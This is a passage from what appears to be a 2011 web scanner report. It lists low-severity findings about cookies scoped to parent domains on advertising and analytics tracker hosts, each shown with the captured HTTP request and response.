Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT
P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA "
Pragma: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 34

GIF89a.............,...........L.;

12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pg.links.origin.channelintelligence.com
Path:   /pages/wl.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=841291_24552604_11302_48968727_13017277_2271669_64856419_13016956_48968727_26080384_8679155&nRID=0&sRnd=B96Gjac1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=00047400302457
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D841291%5F24552604%5F11302%5F48968727%5F13017277%5F2271669%5F64856419%5F13016956%5F48968727%5F26080384%5F8679155%26nRID%3D0%26sRnd%3DB96Gjac1
Content-Length: 716
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:44:36 GMT
Set-Cookie: sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&amp;oid=19483251&amp;linkid=&amp;uid=30314234&amp;rg
...[SNIP]...

12.4. http://pixel.everesttech.net/1688/i

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /1688/i

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1688/i?ev_sid=58&ev_ci=700032768&ev_ai=700644175&ev_cri=705923885&ev_pl HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:44 GMT
Server: Apache
Set-Cookie: everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD.............    pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

12.5. http://ttwbs.channelintelligence.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ttwbs.channelintelligence.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96GjZc1 HTTP/1.1
Host: ttwbs.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=951ED21A%2D5742%2D4191%2DBC56%2D8856DB199D2C

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Jetty(6.1.22)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT
Cache-Control: private
Content-Length: 0
Location: http://content.links.channelintelligence.com/images/blank.gif?y=0
Via: 1.1 iad061102000000 (MII-APC/2.1)
Content-Type: text/plain

12.6. http://a.tribalfusion.com/displayAd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=37103964303 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Tue, 06 Sep 2011 14:59:02 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Mon, 05 Dec 2011 14:59:02 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

12.7. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=271753&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT;
Content-Type: text/html
Location: /z/i.cid?c=271753&d=30&page=landingPage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

12.8. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 267
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginh
...[SNIP]...

12.9. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT;
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 191
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
var img = new Image();
img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=&cc=1&rnd=1228001246";
</script>

12.10. http://a.tribalfusion.com/z/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=271753&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

12.11. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4496
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

12.12. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 15:00:30 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315321124004408&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8&industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

12.13. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=1000004&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1315339017162&ns_c=UTF-8&c8=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&c7=http%3A%2F%2Fwww.cnbc.com%2F&c9=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 14:56:57 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.14. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=3776433&resolution=1920&h=1200&camefrom=&u=http%3A//www.resourcepoint.net/&t=Resource%20Point%20%E2%80%93%20Experts%20in%20eCommerce%2C%20portal%20development%20%26%20content%20management&java=1&security=f2e27155&sc_random=0.36302077560685575&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.15. http://clk.fetchback.com/serve/fb/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



12.16. http://clk.fetchback.com/serve/fb/engmnt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/engmnt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/engmnt HTTP/1.1
